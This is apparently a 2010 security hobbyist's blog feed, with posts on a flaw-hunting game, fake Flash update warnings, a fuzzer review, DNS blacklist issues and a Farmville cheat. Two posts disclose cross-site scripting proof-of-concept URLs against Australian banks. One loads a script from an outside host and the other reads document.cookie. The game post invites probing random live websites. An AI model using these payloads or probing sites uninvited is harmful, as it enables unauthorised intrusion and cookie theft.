Just Another Hacker

Security roulette

Wed, 10 Mar 2010 17:15:34 +1000

I had some spare time, so I created a little game. I've called it security roulette. The object is to find as many web application security flaws as you can in a given number of websites in a limited timeframe.The number of websites is determined by google and the time limit is self imposed or agreed to if you are challenging someone.

I wrote a quick mashup to help you play. The scorecard could probably use some tweaking. My suggested house rule is "no browser plugins or third party applications allowed".

Nifty or dangerous - The unofficial security alert

Wed, 03 Mar 2010 15:07:55 +1000

@dblackshell wrote about a "nifty" feature on his blog a while back. A website he uses has implemented a feature which will alert the end user if their flash version is not up to date. It delivers the message in a very authoritative looking way, as you can see in this image (click for full version).

I tend to disagree with his opinion. It is not "nifty", it is harmful. Although I won't go in depth here, I believe as many other do that user education does not work. Casual computer users does not have the required knowledge to determine the validity of this message at the tip of their fingers. The end result is that we train more users to click accept. What do you think this user will do the next time they are presented with this image?

The latter image is malware disguised as a flash update. Could your parents, grand parents aunts, cousins or friends tell the difference?

CWE/SANS top 25 dangerous programming errors

Mon, 22 Feb 2010 22:06:42 +1000

Unless you're living under a rock, you should have heard of the Common Weakness Enumeration (CWE)/SANS top 25 list. The second annual list was released some time ago and is always worth a read. The guys over at the application security street fighter blog is honouring this years list with a run down of the vulnerabilities and applicable solutions. As usual it's a no nonsense approach to describing the problem and solutions without going too far in depth. I would recommend this blog to any developer, so go have a read...right now :) Number #1 is cross site scripting (XSS),

http://blogs.sans.org/appsecstreetfighter/

Blogkeeping

Sat, 20 Feb 2010 13:57:32 +1000

I've been doing some blog maintenance, updating old posts, spam prevention changes and publishing more pages. If anyone got their RSS feed spammed, I'm sorry.
That's all.

Tool review: Fuzzman

Mon, 15 Feb 2010 22:45:58 +1000

Fuzzman is a simple perl script from cipher.org.uk (the guys that brought you bugle). It is a simple perl script that inspects the man page for a command and enumerates through the combinations of command line options. It then creates a shell script that will run the commands with fuzzing data, such as buffer overflow or format strings. You then run the shell script and look for a crash. It's a simple automated script, with some simple changes you could even make it part of your automated testing suite.

For more information on fuzzman, examples and download go to:
http://www.cipher.org.uk/read/2007/04/18/fuzzman-man-pages-based-fuzzer/

Pros:
By generating the fuzzing script from man pages it can fuzz any binary that has a man page.

Cons:
Many binaries are missing or have inconsistent man pages.

Github just made my day

Wed, 10 Feb 2010 15:00:30 +1000

As much as I needed to read some source code revision history, this made me smile.

All I can say is failicorn > failwhale!

Worlds greatest shave

Wed, 03 Feb 2010 12:43:06 +1000

I'm taking part in the Leukaemia Foundation's World's Greatest Shave 2010. Please sponsor me! The funds we raise will help the Leukaemia Foundation to provide practical care and support to patients and families living with leukaemias, lymphomas, myeloma and related blood disorders.

http://my.imisfriendraising.com.au/personalPage.aspx?registrationID=321839

OpenDNS breaks RBL, google saves the day

Tue, 26 Jan 2010 13:03:58 +1000

The reason behind the change is a simple one. They do not (currently) fudge NXDOMAIN records like openDNS do. This has a tendency to break RBL queries, openDNS "solves" this problem by making exceptions for known RBLs. As you can see from this OLD discussion on the openDNS forums this has been their policy for a long time.

The default RBL services used by the movable type spamlookup plugin are bsb.spamlookup.net and sc.surbl.org. I also use additional lookups like stopforumspam, spamhaus and others. As a result I was constantly experiencing false positives for comments and trackbacks. Changing to google solved all these problems. If you are using niche RBLs and openDNS I would recommend that you test these.

[OpenDNS]

$ host nopes.grrrr.bsb.spamlookup.net 208.67.222.222
nopes.grrrr.bsb.spamlookup.net	A	208.69.32.132
 !!! nopes.grrrr.bsb.spamlookup.net A record has zero ttl

$ host nopes.grrrr.bsb.empty.us 208.67.222.222
nopes.grrrr.bsb.empty.us	A	208.69.32.132
 !!! nopes.grrrr.bsb.empty.us A record has zero ttl

FAIL!

[Google]

$ host nopes.grrrr.bsb.spamlookup.net 8.8.8.8
nopes.grrrr.bsb.spamlookup.net does not exist at google-public-dns-a.google.com, try again

$ host nopes.grrrr.bsb.empty.us 8.8.8.8
nopes.grrrr.bsb.empty.us does not exist at google-public-dns-a.google.com, try again

WINNAR!

I have taken the liberty of reporting these two to openDNS as they are common for MT users, however there are several other RBLs that I use which aren't covered by openDNS. By changing to google public DNS I don't have to put up with false positives. It also saves me the hassle of having to verify and "fix" RBLs every time I make changes.

If you want to make the change you can find the details at: http://code.google.com/speed/public-dns/

The Great Australian Internet Blackout Protest

Sun, 24 Jan 2010 22:57:13 +1000

As you may or may not have noticed, I have blacked out my blog. It's an hour before midnight, but I'd like to get some sleep so I started a little early. If you haven't blacked out your website or blog yet then I recommend that you do it now.

http://www.internetblackout.com.au/websites/

Game hacking - Number theory

Thu, 21 Jan 2010 20:55:59 +1000

For my second wintereenmas article I look at game hacking through number theory. This is a huge subject, even without hacking, but I focused on two of the most common techniques that I have been able put to extensive use. You can read the full article here.

Bank of Queensland XSS

Wed, 20 Jan 2010 14:30:10 +1000

Bank of Queensland had an XSS in their search form;

The link used for this proof of concept is http://search.boq.com.au/search/search.cgi?query_and=&query_phrase=&query_or=&query_not=&sort=title%22%3Ejuju%3Cscript%20src=%27http://justanotherhacker.com/x.js%27%3E&scope=&meta_t=&meta_a=&meta_s=&meta_f_sand=&meta_d1day=&meta_d1month=&meta_d1year=&meta_d2day=&meta_d2month=&meta_d2year=&collection=boq&form=advanced

This hole has been fixed by BoQ.

ING XSS

Mon, 18 Jan 2010 22:23:37 +1000

I found a XSS vulnerability in ING's australian website;
The proof of concept url used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

Farmville cheat - Wintereenmas extra

Sat, 16 Jan 2010 22:48:11 +1000

For my first wintereenmas based post I have decided to share a farmville cheat. It takes advantage of a timing overlap when visiting a neighbours farm. After you click to visit a neighbours farm, but before the help a friend window appears click to visit the same neighbour again. Again, before the help a friend window appears click to visit the neighbours farm. Keep visiting the neighbour before the window appears. It will load overlapping help a friend windows which you can then repeatedly click for endless, instant amounts of 5xp and 20 gold. Granted the gold isn't that much, but the xp quickly adds up.

How the cheat works should be made quite clear in this video I recorded on a new account (you have to complete the tutorial for this to work);

The cheat no longer works as displayed in the video. If you log back into the account you will be level 0. Publishing the links for leveling may let the neighbours of the cheating farmer get the leveling bonus. Gifting may also work. I haven't bothered testing. You can keep going indefinitely, I just stopped because I hit a lag spike.

Happy wintereenmas (2010)

Sat, 16 Jan 2010 08:46:24 +1000

It is that time of the year again and as a member of the nintendo generation I am planning to celebrate wintereenmas with some solid gaming sessions. I will also be posting some game related articles on the blog. However as I am participating in the internet blackout during the week of wintereenmas I have decided to move the gaming extravaganza forward. So over the next week I will be making early wintereenmas posts and spreading wintereenmas cheers.

I'll start by plugging these websites;

http://blog.oarsum.com/
A gaming oriented blog run by a former colleague and friend. Topics range from board games to online games.

http://www.leaguecraft.com/
League of Legends website with detailed guides, hero, items and recipe info and more.

Welcome to the new decade

Wed, 13 Jan 2010 22:35:12 +1000

It's a new year, a new decade and already it's had it's ups and downs. I still haven't completed my redesign, but it's coming together slowly and should be ready soon.

The Australian government's mandatory censorship is still a big concern for me. The biggest activist event this month is the Australian internet blackout protest and Australia day protest parties. The January 30th capital city protests were moved to Saturday March 6th (As noted on the facebook event page http://www.facebook.com/event.php?eid=200213317223).

I strongly encourage you to participate in the internet blackout and other protests. For more details on the internet blackout, go to http://www.internetblackout.com.au/